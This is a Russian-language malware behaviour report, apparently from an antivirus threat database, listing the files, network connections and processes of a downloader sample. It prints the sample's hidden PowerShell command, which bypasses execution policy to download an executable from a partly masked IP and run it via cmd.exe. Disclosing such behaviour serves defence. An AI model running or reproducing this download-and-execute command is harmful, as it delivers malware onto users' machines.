Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://19#.#2.66.100/gsfcjfh.exe как %appdata%\y8qom0xggqq.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Y8qOm0XGgQQ.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\sbdtfhgygeghdpœ.sct
- %APPDATA%\y8qom0xggqq.exe
Удаляет следующие файлы
- %TEMP%\sbdtfhgygeghdpœ.sct
Сетевая активность
Подключается к
- '19#.#2.66.100':80
TCP
Запросы HTTP GET
- http://19#.#2.66.100/Gsfcjfh.exe
- http://19#.#2.66.100/Gsfcjfh_Smdqjvrb.bmp
Другое
Создает и запускает на исполнение
- '%APPDATA%\y8qom0xggqq.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://19#.#2.66.100/Gsfcjfh.exe','%APPDATA%\Y8qOm0XGgQQ.exe')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Y8qOm0XGgQQ.exe' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==
- '%WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe'
